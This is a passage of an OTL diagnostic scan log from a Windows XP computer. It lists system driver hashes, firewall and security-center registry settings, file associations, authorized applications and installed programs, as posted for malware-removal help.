[2010/05/06 20:37:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Stardock
[2010/02/16 21:00:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Steinberg
[2010/04/16 08:02:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\TeamViewer
[2010/02/14 23:09:12 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\TP
[2010/02/28 15:47:59 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Unity
[2010/05/13 20:25:25 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\uTorrent
[2010/04/25 20:31:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\vfx
[2010/02/22 20:03:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Windows Search

[color=#E56717]========== Purity Check ==========[/color]



[color=#E56717]========== Custom Scans ==========[/color]


[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]


[color=#A23BEC]< MD5 for: AGP440.SYS  >[/color]
[2008/04/14 01:06:40 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\ERDNT\cache\agp440.sys
[2008/04/14 01:06:40 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\ServicePackFiles\i386\agp440.sys
[2008/04/14 01:06:40 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\system32\drivers\agp440.sys
[2004/08/04 00:07:42 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=2C428FA0C3E3A01ED93C9B2A27D8D4BB -- C:\WINDOWS\SoftwareDistribution\Download\2d8407673ea9865ef7cd775540e3a36b\backup\agp440.sys

[color=#A23BEC]< MD5 for: AHCIX86.SYS  >[/color]
[2009/04/08 02:46:22 | 000,189,968 | ---- | M] (Advanced Micro Devices, Inc) MD5=3936A49ECB74CF23BBB6979CD683DD56 -- C:\WINDOWS\system32\drivers\ahcix86.sys

[color=#A23BEC]< MD5 for: ATAPI.SYS  >[/color]
[2008/04/14 01:10:32 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ERDNT\cache\atapi.sys
[2008/04/14 01:10:32 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ServicePackFiles\i386\atapi.sys
[2008/04/14 01:10:32 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys
[2004/08/04 06:00:00 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\$NtServicePackUninstall$\atapi.sys
[2004/08/04 06:00:00 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\SoftwareDistribution\Download\2d8407673ea9865ef7cd775540e3a36b\backup\atapi.sys

[color=#A23BEC]< MD5 for: EVENTLOG.DLL  >[/color]
[2010/01/27 00:59:08 | 000,028,797 | R--- | M] () MD5=486232DD9FDCAA3FF410E10BB0D0C5D4 -- C:\Perl\lib\auto\Win32\EventLog\EventLog.dll
[2008/04/14 06:41:54 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=6D4FEB43EE538FC5428CC7F0565AA656 -- C:\WINDOWS\ERDNT\cache\eventlog.dll
[2008/04/14 06:41:54 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=6D4FEB43EE538FC5428CC7F0565AA656 -- C:\WINDOWS\ServicePackFiles\i386\eventlog.dll
[2008/04/14 06:41:54 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=6D4FEB43EE538FC5428CC7F0565AA656 -- C:\WINDOWS\system32\eventlog.dll
[2004/08/04 06:00:00 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=82B24CB70E5944E6E34662205A2A5B78 -- C:\WINDOWS\$NtServicePackUninstall$\eventlog.dll
[2004/08/04 06:00:00 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=82B24CB70E5944E6E34662205A2A5B78 -- C:\WINDOWS\SoftwareDistribution\Download\2d8407673ea9865ef7cd775540e3a36b\backup\eventlog.dll

[color=#A23BEC]< MD5 for: IASTOR.SYS  >[/color]
[2006/02/21 18:44:30 | 000,250,368 | ---- | M] (Intel Corporation) MD5=88B1943ECFF661F765228099138CF6AB -- C:\WINDOWS\dell\iastor\iastor.sys

[color=#A23BEC]< MD5 for: NETLOGON.DLL  >[/color]
[2008/04/14 06:42:02 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=1B7F071C51B77C272875C3A23E1E4550 -- C:\WINDOWS\ERDNT\cache\netlogon.dll
[2008/04/14 06:42:02 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=1B7F071C51B77C272875C3A23E1E4550 -- C:\WINDOWS\ServicePackFiles\i386\netlogon.dll
[2008/04/14 06:42:02 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=1B7F071C51B77C272875C3A23E1E4550 -- C:\WINDOWS\system32\netlogon.dll
[2009/02/06 14:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\$hf_mig$\KB968389\SP2QFE\netlogon.dll
[2009/02/06 14:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\$hf_mig$\KB975467\SP2QFE\netlogon.dll
[2004/08/04 06:00:00 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=96353FCECBA774BB8DA74A1C6507015A -- C:\WINDOWS\$NtServicePackUninstall$\netlogon.dll
[2004/08/04 06:00:00 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=96353FCECBA774BB8DA74A1C6507015A -- C:\WINDOWS\SoftwareDistribution\Download\2d8407673ea9865ef7cd775540e3a36b\backup\netlogon.dll

[color=#A23BEC]< MD5 for: NVATABUS.SYS  >[/color]
[2006/03/16 20:51:32 | 000,099,840 | ---- | M] (NVIDIA Corporation) MD5=B7FB72492B753930EC70A0F49D04F12F -- C:\WINDOWS\dell\nvraid\NvAtaBus.sys
[2006/03/16 20:51:32 | 000,099,840 | ---- | M] (NVIDIA Corporation) MD5=B7FB72492B753930EC70A0F49D04F12F -- C:\WINDOWS\system32\drivers\NvAtaBus.sys

[color=#A23BEC]< MD5 for: SCECLI.DLL  >[/color]
[2004/08/04 06:00:00 | 000,180,224 | ---- | M] (Microsoft Corporation) MD5=0F78E27F563F2AAF74B91A49E2ABF19A -- C:\WINDOWS\$NtServicePackUninstall$\scecli.dll
[2004/08/04 06:00:00 | 000,180,224 | ---- | M] (Microsoft Corporation) MD5=0F78E27F563F2AAF74B91A49E2ABF19A -- C:\WINDOWS\SoftwareDistribution\Download\2d8407673ea9865ef7cd775540e3a36b\backup\scecli.dll
[2008/04/14 06:42:06 | 000,181,248 | ---- | M] (Microsoft Corporation) MD5=A86BB5E61BF3E39B62AB4C7E7085A084 -- C:\WINDOWS\ERDNT\cache\scecli.dll
[2008/04/14 06:42:06 | 000,181,248 | ---- | M] (Microsoft Corporation) MD5=A86BB5E61BF3E39B62AB4C7E7085A084 -- C:\WINDOWS\ServicePackFiles\i386\scecli.dll
[2008/04/14 06:42:06 | 000,181,248 | ---- | M] (Microsoft Corporation) MD5=A86BB5E61BF3E39B62AB4C7E7085A084 -- C:\WINDOWS\system32\scecli.dll

[color=#A23BEC]< MD5 for: SYMMPI.SYS  >[/color]
[2005/11/17 14:58:16 | 000,092,672 | ---- | M] (LSI Logic) MD5=1FD5249D5103125D2DA63F68D7BE1D35 -- C:\WINDOWS\dell\symmpi\symmpi.sys
[2005/11/17 14:58:16 | 000,092,672 | ---- | M] (LSI Logic) MD5=1FD5249D5103125D2DA63F68D7BE1D35 -- C:\WINDOWS\system32\drivers\symmpi.sys

[color=#A23BEC]< %systemroot%\*. /mp /s >[/color]

[color=#A23BEC]< %systemroot%\system32\*.dll /lockedfiles >[/color]
[2008/04/14 06:41:56 | 000,344,064 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5[/b] -- C:\WINDOWS\system32\hnetcfg.dll
[4 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]

[color=#A23BEC]< %systemroot%\Tasks\*.job /lockedfiles >[/color]

[color=#A23BEC]< %systemroot%\system32\drivers\*.sys /lockedfiles >[/color]
[2010/02/14 01:13:11 | 000,691,696 | ---- | M] ()[b] Unable to obtain MD5[/b] -- C:\WINDOWS\system32\drivers\sptd.sys

[color=#A23BEC]< %systemroot%\System32\config\*.sav >[/color]
[2010/02/12 16:46:28 | 000,094,208 | ---- | M] () -- C:\WINDOWS\system32\config\default.sav
[2010/02/12 16:46:28 | 000,659,456 | ---- | M] () -- C:\WINDOWS\system32\config\software.sav
[2010/02/12 16:46:28 | 000,942,080 | ---- | M] () -- C:\WINDOWS\system32\config\system.sav

[color=#A23BEC]< %systemdrive%\*.sys /90 /md5 >[/color]
[2010/02/12 22:03:36 | 000,000,000 | ---- | M] () MD5=D41D8CD98F00B204E9800998ECF8427E -- C:\CONFIG.SYS
[2010/02/12 22:03:36 | 000,000,000 | RHS- | M] () MD5=D41D8CD98F00B204E9800998ECF8427E -- C:\IO.SYS
[2010/02/12 22:03:36 | 000,000,000 | RHS- | M] () MD5=D41D8CD98F00B204E9800998ECF8427E -- C:\MSDOS.SYS
[2010/05/13 16:57:47 | 2145,386,496 | -HS- | M] ()[b] Unable to obtain MD5[/b] -- C:\pagefile.sys

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 145 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:5B4BB726
< End of report >


Extras.txt:
CODE
OTL Extras logfile created on: 5/13/2010 8:32:43 PM - Run 1
OTL by OldTimer - Version 3.2.4.1     Folder = C:\Documents and Settings\Me\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

3.00 Gb Total Physical Memory | 2.00 Gb Available Physical Memory | 76.00% Memory free
5.00 Gb Paging File | 4.00 Gb Available in Paging File | 86.00% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 100.08 Gb Total Space | 72.00 Gb Free Space | 71.95% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded
Drive J: | 931.51 Gb Total Space | 19.51 Gb Free Space | 2.09% Space Free | Partition Type: NTFS

Computer Name: Mine
Current User Name: Me
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: Current user
Company Name Whitelist: On
Skip Microsoft Files: On
File Age = 90 Days
Output = Standard
Quick Scan

[color=#E56717]========== Extra Registry (SafeList) ==========[/color]


[color=#E56717]========== File Associations ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.ini [@ = Notepad++_file] -- C:\Program Files\Notepad++\notepad++.exe (Don HO don.h@free.fr)
.txt [@ = Notepad++_file] -- C:\Program Files\Notepad++\notepad++.exe (Don HO don.h@free.fr)

[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)

[color=#E56717]========== Shell Spawning ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
htmlfile [edit] -- "C:\Program Files\Microsoft Office\Office14\msohtmed.exe" %1 (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l (Microsoft Corporation)
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" ()
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" ()
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

[color=#E56717]========== Security Center Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled" = 1
"AntiVirusDisableNotify" = 0
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 0
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"139:TCP" = 139:TCP:*:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:*:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:*:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:*:Enabled:@xpsp2res.dll,-22002
"3389:TCP" = 3389:TCP:*:Disabled:@xpsp2res.dll,-22009

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"139:TCP" = 139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002
"3389:TCP" = 3389:TCP:*:Disabled:@xpsp2res.dll,-22009
"22:TCP" = 22:TCP:*:Disabled:SSH
"5800:TCP" = 5800:TCP:*:Disabled:VNC
"5900:TCP" = 5900:TCP:*:Disabled:Apple Remote Desktop

[color=#E56717]========== Authorized Applications List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe" = C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe:*:Enabled:Windows Live Sync -- (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\GIGABYTE\GBTUpd\RunUpd.exe" = C:\Program Files\GIGABYTE\GBTUpd\RunUpd.exe:*:Enabled:RunUpd -- (Gigabyte)
"C:\Program Files\GIGABYTE\GBTUpd\GBTUpd.exe" = C:\Program Files\GIGABYTE\GBTUpd\GBTUpd.exe:*:Enabled:GBTUpd.exe -- (GIGABYTE)
"C:\Program Files\GIGABYTE\@BIOS\gwflash.exe" = C:\Program Files\GIGABYTE\@BIOS\gwflash.exe:*:Enabled:@BIOS Application -- ()
"C:\Program Files\uTorrent\uTorrent.exe" = C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent -- (BitTorrent, Inc.)
"C:\Documents and Settings\Me\Application Data\Dropbox\bin\Dropbox.exe" = C:\Documents and Settings\Me\Application Data\Dropbox\bin\Dropbox.exe:*:Enabled:Dropbox -- ()
"J:\Documents\John\ssh\Xming\Xming.exe" = J:\Documents\John\ssh\Xming\Xming.exe:*:Enabled:Xming X Server -- ()
"C:\WINDOWS\system32\javaw.exe" = C:\WINDOWS\system32\javaw.exe:*:Enabled:Java(TM) Platform SE binary -- (Sun Microsystems, Inc.)
"C:\Program Files\Java\jre6\bin\java.exe" = C:\Program Files\Java\jre6\bin\java.exe:*:Enabled:Java(TM) Platform SE binary -- (Sun Microsystems, Inc.)
"C:\Program Files\Syslogd\Syslogd.exe" = C:\Program Files\Syslogd\Syslogd.exe:*:Enabled:Kiwi Syslog Server -- (Kiwi Enterprises)
"C:\Program Files\Java\jre6\bin\javaw.exe" = C:\Program Files\Java\jre6\bin\javaw.exe:*:Enabled:Java(TM) Platform SE binary -- (Sun Microsystems, Inc.)
"C:\Program Files\GIGABYTE\@BIOS\UpdExe.exe" = C:\Program Files\GIGABYTE\@BIOS\UpdExe.exe:*:Enabled:Exe File -- (GIGABYTE)
"C:\Program Files\GIGABYTE\@BIOS\GBTUpd.exe" = C:\Program Files\GIGABYTE\@BIOS\GBTUpd.exe:*:Enabled:GBTUpd.exe -- (GIGABYTE)
"C:\WINDOWS\system32\dpvsetup.exe" = C:\WINDOWS\system32\dpvsetup.exe:*:Disabled:Microsoft DirectPlay Voice Test -- (Microsoft Corporation)
"C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE" = C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE:*:Disabled:Microsoft Office OneNote -- (Microsoft Corporation)
"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" = C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE:*:Disabled:Microsoft Office Outlook -- (Microsoft Corporation)
"C:\Program Files\Microsoft Office\Office14\GROOVE.EXE" = C:\Program Files\Microsoft Office\Office14\GROOVE.EXE:*:Disabled:Microsoft SharePoint Workspace -- (Microsoft Corporation)
"C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe" = C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe:*:Disabled:Windows Live Sync -- (Microsoft Corporation)


[color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{00C5F4F4-62F9-40D7-8000-AD8A9CD0C669}" = Microsoft Games for Windows - LIVE Redistributable
"{015C5B35-B678-451C-9AEE-821E8D69621C}_is1" = PeerBlock 1.0+ (r320)
"{0886900B-B2F3-452C-B580-60F1253F7F80}" = Native Instruments Controller Editor
"{0B8565BA-BAD5-4732-B122-5FD78EFC50A9}" = Native Instruments Service Center
"{0C826C5B-B131-423A-A229-C71B3CACCD6A}" = CDDRV_Installer
"{106F886B-A874-43DF-BCC4-01DB57E1F3C6}" = Windows Movie Maker 2 Winter Fun Pack
"{10CD364B-FFCC-48BE-B469-B9622A033075}" = Fences
"{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP620_series" = Canon MP620 series MP Drivers
"{121634B0-2F4B-11D3-ADA3-00C04F52DD52}" = Windows Installer Clean Up
"{12230A4C-6902-4001-B606-48C6FC98B42A}" = Thomas New Line
"{139E303E-1050-497F-98B1-9AE87B15C463}" = Windows Live Family Safety
"{178832DE-9DE0-4C87-9F82-9315A9B03985}" = Windows Live Writer
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{20140000-0010-0409-0000-0000000FF1CE}" = Microsoft Software Update for Web Folders  (English) 14 (Beta)
"{20140000-0011-0000-0000-0000000FF1CE}" = Microsoft Office Professional Plus 2010 (Beta)
"{20140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010 (Beta)
"{20140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010 (Beta)
"{20140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010 (Beta)
"{20140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010 (Beta)
"{20140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010 (Beta)
"{20140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010 (Beta)
"{20140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010 (Beta)
"{20140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010 (Beta)
"{20140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010 (Beta)
"{20140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010 (Beta)
"{20140000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2010 (Beta)
"{20140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010 (Beta)
"{20140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010 (Beta)
"{20140000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2010 (Beta)
"{20140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010 (Beta)
"{20140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010 (Beta)
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live Upload Tool
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{26A24AE4-039D-4CA4-87B4-2F83216018FF}" = Java(TM) 6 Update 20
"{27D0C7AB-59F1-4D4D-A0BB-05A31AC919EA}" = Windows XP Winter Fun Pack Screensavers
"{2930FB47-6452-4476-BF16-D77F748646DB}" = Native Instruments GuitarRig Mobile IO Driver
"{3101CB58-3482-4D21-AF1A-7057FC935355}" = KhalInstallWrapper
"{32A3A4F4-B792-11D6-A78A-00B0D0160180}" = Java(TM) SE Development Kit 6 Update 18
"{33BC9D7E-E790-495E-A4EA-CFB160C17A91}" = Logitech Gaming Software 5.08
"{342126E1-173C-4585-BFBE-3EBDD20E3E9E}" = Mobipocket Reader 6.2
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{3C26E039-BE18-4B5E-A723-45390C451819}" = Windows XP Creativity Fun Packs - Windows Movie Maker 2 - Titles
"{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{45338B07-A236-4270-9A77-EBB4115517B5}" = Windows Live Sign-in Assistant
"{485E6526-EA98-4F04-925A-67424D12E1E2}" = Windows XP Creativity Fun Packs - Windows XP Power Toys
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4E25C468-7745-4051-8B37-4A2C6635BA8B}" = Update Manager B09.0908.1
"{4F41AD68-89F2-4262-A32C-2F70B01FCE9E}" = Photo Story 3 for Windows
"{55C09FC1-D2D8-495A-BD80-D6725F0DCA58}" = Logitech GamePanel Software 3.04.137
"{5684CDBB-5CB8-4E26-9F19-9DF037C143AC}" = Venue InterLok Driver Kit
"{5D95AD35-368F-47D5-B63A-A082DDF00119}" = Microsoft Digital Image Suite 2006 Editor
"{691F4068-81BF-49E3-B32E-FE3E16400119}" = Microsoft Digital Image Suite 2006 Library
"{6ADD0603-16EF-400D-9F9E-486432835002}" = OpenOffice.org 3.2
"{6DC0632A-A838-4B34-AC19-0FA18E1C533C}" = Sentinel Protection Installer 7.2.2
"{716E0306-8318-4364-8B8F-0CC4E9376BAC}" = MSXML 4.0 SP2 Parser and SDK
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{77E6AE74-357C-4B33-8324-FDDC9997B4D1}" = Princess Magical Dress-Up
"{7930FB47-6452-4476-BF16-D77F748646DB}" = Native Instruments Session IO Driver
"{7E20EFE6-E604-48C6-8B39-BA4742F2CDB4}" = Zune Desktop Theme
"{81128EE8-8EAD-4DB0-85C6-17C2CE50FF71}" = Windows Live Essentials
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}" = Windows Live Sync
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8A74DEFD-A224-49CC-AB80-4E88BC730125}" = LogMeIn Hamachi
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{98613C99-1399-416C-A07C-1EE1C585D872}" = SeaTools for Windows
"{98FD8BB5-59A9-4163-883C-2997F7BB59D9}" = Microsoft Video Screensaver
"{9F7FC79B-3059-4264-9450-39EB368E3225}" = Microsoft Digital Image Library 9 - Blocker
"{A066194B-DC8F-449A-8E0F-B57BDD3A2072}" = SyncToy 2.1 (x86)
"{A1C962E2-2426-49C6-A38B-9A07E40D607C}" = Microsoft Games for Windows - LIVE
"{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}" = Segoe UI
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{A498D9EB-927B-459B-85D6-DD6EF8C2C564}" = erLT
"{A49F249F-0C91-497F-86DF-B2585E8E76B7}" = Microsoft Visual C++ 2005 Redistributable
"{A6264FF6-C49D-4533-AF42-4875C38BB24C}" = Windows XP Creativity Fun Packs - Windows Movie Maker 2 - Audio
"{AA468551-1794-42FE-B504-C41D75EEBDF2}_is1" = Partition Wizard Home Edition 5.0
"{B2DC3F08-2EB2-49A5-AA24-15DFC8B1CB83}" = @BIOS Ver.2.06
"{B962AD08-335F-46f7-A182-257D37672E5C}" = Native Instruments Rig Kontrol 3 Driver
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C151CE54-E7EA-4804-854B-F515368B0798}" = AMD Processor Driver
"{C7FAFC98-5ECC-40FC-B440-A5D5FE3A6A6E}" = Native Instruments Guitar Rig 4
"{C87BB591-A01B-47ED-AFD3-2B7169857F0F}" = Bob the Builder - Bob's Castle Adventure
"{C9BED750-1211-4480-B1A5-718A3BE15525}" = REALTEK GbE & FE Ethernet PCI-E NIC Driver
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D0F136FF-8BD5-4650-9E79-17162D30C12D}" = Windows XP Creativity Fun Packs - Digital Photography
"{D3A80508-CD83-4CA3-8671-914A1BC78B61}" = Microsoft Sync Framework 2.0 Provider Services (x86) ENU
"{D6C75F0B-3BC1-4FC9-B8C5-3F7E8ED059CA}" = Windows Live Photo Gallery
"{DB4F122C-02CB-4EBB-B283-D22F180EBD84}_is1" = D-Box 2.2
"{DEA314C4-0929-4250-BC92-98E4C105F28D}" = NVIDIA PhysX
"{E76FCE6B-9999-4250-8C75-B2DA4AD41268}" = Face_Wizard B09.0914.01
"{EB5F211D-85D5-44C4-BB15-1207C77EF430}" = Visual C++ 8.0 Runtime Setup Package
"{ED00D08A-3C5F-488D-93A0-A04F21F23956}" = Windows Live Communications Platform
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
"{F0E2B312-D7FD-4349-A9B6-E90B36DB1BD0}" = Paint.NET v3.5.5
